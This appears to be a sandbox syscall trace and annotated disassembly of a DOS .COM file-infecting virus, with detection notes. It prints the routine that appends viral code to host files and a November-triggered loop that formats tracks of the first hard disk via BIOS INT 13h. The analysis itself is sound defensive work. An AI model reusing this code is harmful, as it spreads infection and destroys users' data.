2018-12-25T12:54:09.194636474Z 67 PC: 12c0c | Get or set file attributes
2018-12-25T12:54:09.205369707Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.207835619Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.217579209Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.224420999Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.230876145Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.232879745Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.2348306Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.242420564Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.244177818Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.250392251Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.252107329Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.260455852Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.27007305Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.272469206Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.282277418Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.288583467Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.294693214Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.296394253Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.298359936Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.305980327Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.307651839Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.31388921Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.315933494Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.323609944Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.333113395Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.335517047Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.345017354Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.351500426Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.357609458Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.359167487Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.361102471Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.368776354Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.370340376Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.376908126Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.37819119Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.385929861Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.392072196Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.393812082Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.403140028Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.409579784Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.415556942Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.416991804Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.418968262Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.426497015Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.428418449Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.435249955Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.436542548Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.444471383Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.454195858Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.456593181Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.466033587Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.472453803Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.478699153Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.480468701Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.48282529Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.491513971Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.492892639Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.499947542Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.501229235Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.509132622Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.519779421Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.522472113Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.536518812Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.543591563Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.549851473Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.551076081Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.554027168Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.561782141Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.562977207Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.570318266Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.571773967Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.579155468Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.589384924Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.591872033Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.601294741Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.608200887Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.610694967Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.61209922Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.621838751Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.634457975Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.637148882Z 59 PC: 12b40 | Change current directory
2018-12-25T12:54:09.642074915Z 78 PC: 12ae7 | Find first file (See above)
2018-12-25T12:54:09.645942438Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.652014652Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.656882637Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.661671229Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.662811139Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.669833941Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.679083797Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.681474225Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.693692529Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.700751321Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.706766775Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.708945589Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.715962748Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.725301769Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.728869911Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.738331771Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.744645806Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.751776721Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.753201999Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.762512684Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.773012396Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.776183936Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.785863552Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.792304573Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.799067367Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.800353938Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.807304622Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.81910072Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.821467722Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.831411219Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.838189966Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.844262754Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.845838848Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.852798986Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.862382378Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.865225136Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.874936747Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.886725976Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.894637254Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.896238465Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.903474134Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.913398425Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.916787097Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.92661317Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.933143422Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.939668857Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.940966889Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.950387622Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.95993392Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.962302057Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.971510633Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.978199066Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.984206438Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.985605363Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.993039167Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.004705581Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.006855097Z 26 PC: 12af9 | Set disk transfer address
2018-12-25T12:54:10.008120316Z 59 PC: 12b03 | Change current directory
; Listing printed by the sandbox from the return address of the Get date call (INT 21h AH=2Ah, op 42).
; It is a month check guarding a BIOS disk call and a message, followed by the jump back to the host program.
; In this run the trace logs the message display at PC 12b2b, so the guarded path ran.
; NOTE(review): the date record printed just before this trace gives Month 11; presumably it configures this run - confirm.
; For detection: the disk call is INT 13h, not INT 21h, and it has no row in this syscall table even though the path ran.
2018-12-25T12:54:10.009628527Z 42 PC: 12b07 | Get date 0x12b07: cmp dh, 0xb    ; DH = month returned by Get date; 0x0b = November
0x12b0a: jne 0x12b2b    ; any other month: skip straight to the host hand-off
0x12b0c: mov ch, 0    ; CH = track counter, starts at 0
0x12b0e: mov ax, 0x50d    ; AH = 05h, BIOS disk "format track"; AL = 0x0d
0x12b11: mov cl, 1    ; reloaded on every pass, so CX is non-zero when loopne decrements it
0x12b13: mov dx, 0x80    ; DH = head 0, DL = 80h = first fixed disk
0x12b16: int 0x13    ; BIOS disk service; destructive to the addressed track
0x12b18: inc ch
0x12b1a: cmp ch, 0xd
0x12b1d: loopne 0x12b0e    ; repeat until CH reaches 0x0d, i.e. tracks 0..12 (assuming INT 13h preserves CX)
0x12b1f: call 0x12b64    ; helper outside this listing
0x12b22: mov dx, 0x2e0
0x12b25: add dx, si    ; DX = SI + 0x2e0, the '$'-terminated message
0x12b27: mov ah, 9    ; INT 21h AH=09h, display string
0x12b29: int 0x21
0x12b2b: mov bx, 0x100    ; 0x100 = entry offset of a COM image
0x12b2e: push bx
0x12b2f: ret    ; push + ret acts as a near jump to offset 0x100, handing control to the host program
0x12b30: cmp byte ptr [si + 0x2d7], 1    ; not reached by fall-through (follows the ret); part of another path
0x12b35: je 0x12aec    ; 0x12aec lies just after the find-file call site (PC 12ae7), presumably the search loop - confirm
2018-12-25T12:54:10.014097738Z 9 PC: 12b2b | Display string (String= 'Big brother is watching you. Virus Factory 93 ')
2018-12-25T12:54:10.021350172Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16880,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:54:09.230879447Z 71 PC: 12ac3 | Get current directory
2018-12-25T12:54:09.233623432Z 47 PC: 12ac8 | Get disk transfer address
2018-12-25T12:54:09.234411268Z 26 PC: 12ad9 | Set disk transfer address
2018-12-25T12:54:09.23508472Z 78 PC: 12ae7 | Find first file
2018-12-25T12:54:09.238928198Z 67 PC: 12b85 | Get or set file attributes
2018-12-25T12:54:09.256116347Z 61 PC: 12b8c | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:54:09.267833976Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:54:09.274560779Z 66 PC: 12bb4 | Move file pointer
; Listing printed by the sandbox from the return address of the Get time call (INT 21h AH=2Ch, op 44).
; It writes 526 + DL bytes from SI+0x104 to the open file, then rewrites the file's first 4 bytes.
; SI and the file handle (5 in the trace) are set outside this listing; SI is presumably the code's base offset - confirm.
; For detection: the appended length varies per file (526..625 bytes), so a fixed size delta is not a reliable indicator.
2018-12-25T12:54:09.275768913Z 44 PC: 12bbf | Get time 0x12bbf: xor dh, dh    ; clear DH (seconds) so DX = DL, the hundredths value returned by Get time
0x12bc1: mov cx, 0x20e    ; 0x20e = 526, the size in the sample name (Einvolk.526)
0x12bc4: add cx, dx    ; write length = 526 + DL; the trace logs 600 bytes here, i.e. DL = 74
0x12bc6: mov dx, 0x104
0x12bc9: add dx, si    ; DX = SI + 0x104, source buffer for the write
0x12bcb: mov ah, 0x40    ; INT 21h AH=40h, write to file (op 64 in the trace)
0x12bcd: int 0x21    ; written at the current position; the earlier Move file pointer (PC 12bb4) is not shown, presumably a seek to end of file
0x12bcf: call 0x22b47    ; NOTE(review): target is 0x10000 away from the rest of the listing; possibly 0x12b47 after 16-bit wrap - confirm
0x12bd2: jb 0x12beb    ; carry set: skip the 4-byte header rewrite
0x12bd4: mov ax, 0x4200    ; INT 21h AX=4200h, move file pointer relative to start of file
0x12bd7: xor dx, dx
0x12bd9: xor cx, cx    ; CX:DX = 0, i.e. offset 0
0x12bdb: int 0x21
0x12bdd: jb 0x12beb    ; seek failed: skip the header rewrite
0x12bdf: mov ah, 0x40    ; second write
0x12be1: mov dx, 0x2dc
0x12be4: add dx, si    ; DX = SI + 0x2dc, the 4 replacement bytes
0x12be6: mov cx, 4    ; matches the "Write 4 bytes" row and the earlier 4-byte read of the same file
0x12be9: int 0x21
0x12beb: mov ax, 0x5701    ; AX=5701h = set file date/time; the call is past the listing (logged at PC 12bf8), presumably restoring the original stamp
2018-12-25T12:54:09.278302795Z 64 PC: 12bcf | Write file or device (Write 600 bytes on handle 5)
2018-12-25T12:54:09.286430347Z 66 PC: 12bdd | Move file pointer
2018-12-25T12:54:09.287648817Z 64 PC: 12beb | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:54:09.293862141Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:54:09.295311804Z 62 PC: 12bfc | Close file
2018-12-25T12:54:09.302912017Z 67 PC: 12c0c | Get or set file attributes
2018-12-25T12:54:09.312932756Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.315598448Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.325244849Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.331541131Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.33763626Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.339629487Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.342401802Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.350406974Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.352174862Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.358309931Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.359707266Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.369728542Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.379354305Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.38182916Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.392206587Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.398814364Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.404941635Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.406329789Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.409073098Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.416679238Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.418002794Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.424260815Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.425734865Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.433585892Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.442989636Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.445400403Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.454965129Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.461385411Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.467579635Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.469554261Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.471740378Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.479521879Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.480869475Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.487893469Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.489296311Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.496932231Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.50688933Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.509356781Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.518755215Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.525568667Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.532265875Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.533662826Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.538120567Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.546188959Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.547885693Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.554909389Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.556256808Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.563778773Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.573833834Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.57644997Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.585792754Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.59290424Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.599615984Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.601133858Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.603700368Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.612305639Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.613726295Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.620827617Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.62240914Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.629669179Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.638325113Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.640752024Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.650052383Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.657347593Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.665230281Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.666893219Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.669726755Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.677912172Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.679182782Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.685779292Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.68722331Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.694709997Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.704548426Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.706911722Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.716368724Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.723412149Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.730029627Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.731518314Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.739465113Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.749041864Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.751326104Z 59 PC: 12b40 | Change current directory
2018-12-25T12:54:09.756230203Z 78 PC: 12ae7 | Find first file (See above)
2018-12-25T12:54:09.761957933Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.77402046Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.786228012Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.793179647Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.794682407Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.802836434Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.812911084Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.815901301Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.825966996Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.832323175Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.838426977Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.840201075Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.849682755Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.859557536Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.862648563Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.872022589Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.878854063Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.885375011Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.887056889Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.891717237Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.899690325Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.901719921Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.910194356Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.917848406Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.922152662Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.92352867Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.930816359Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.940472632Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.942979882Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.952606951Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.956810482Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.962812248Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.964683935Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.9734375Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.985518267Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.988496547Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.997892024Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:10.004123901Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:10.010634844Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:10.011966534Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.01866673Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.029158289Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.031632211Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:10.043884312Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:10.050643573Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:10.056797446Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:10.058159946Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.065867496Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.075636519Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.078123516Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:10.088362729Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:10.099234117Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:10.105747413Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:10.107448955Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.114517424Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.124017655Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.12647156Z 26 PC: 12af9 | Set disk transfer address
2018-12-25T12:54:10.127958404Z 59 PC: 12b03 | Change current directory
; Disassembly window the sandbox attached to the INT 21h "Get date" event
; (syscall op 42 = AH 2Ah): a date check, a BIOS disk loop, a message, and
; the jump back to the host program.
; Get date returns the month in DH, so the first compare is "month == 11".
; NOTE(review): the rows of this trace name INT 21h services only; the
; INT 13h calls below get no row of their own, so a missing disk row does
; not show that the disk was left untouched.
2018-12-25T12:54:10.129613397Z 42 PC: 12b07 | Get date 0x12b07: cmp dh, 0xb
; Any other month skips straight to the host hand-off at 0x12b2b.
0x12b0a: jne 0x12b2b
; November only. Each pass calls INT 13h with AH=05h (BIOS "format track"),
; AL=0Dh, CH=cylinder, CL=1, DH=0 (head 0) and DL=80h (first fixed disk).
; ES:BX is not loaded anywhere inside this window.
0x12b0c: mov ch, 0
0x12b0e: mov ax, 0x50d
0x12b11: mov cl, 1
0x12b13: mov dx, 0x80
0x12b16: int 0x13
; CH counts 0..0Ch. LOOPNE leaves the loop when the compare with 0Dh sets
; ZF; CX cannot hit zero first because CH is non-zero after the INC.
0x12b18: inc ch
0x12b1a: cmp ch, 0xd
0x12b1d: loopne 0x12b0e
; Routine at 0x12b64 is outside this window; its purpose cannot be read here.
0x12b1f: call 0x12b64
; INT 21h AH=09h prints the '$'-terminated string at SI+0x2E0.
0x12b22: mov dx, 0x2e0
0x12b25: add dx, si
0x12b27: mov ah, 9
0x12b29: int 0x21
; Push 0x100 and RET to it: 0x100 is the entry offset of a DOS .COM image,
; so this transfers control to the host (presumably already restored in
; memory by code outside this window).
0x12b2b: mov bx, 0x100
0x12b2e: push bx
0x12b2f: ret
; Not reachable by falling through the RET; entered from elsewhere. Tests a
; flag byte at SI+0x2D7 and branches back to 0x12aec (both outside this view).
0x12b30: cmp byte ptr [si + 0x2d7], 1
0x12b35: je 0x12aec
2018-12-25T12:54:10.131694303Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

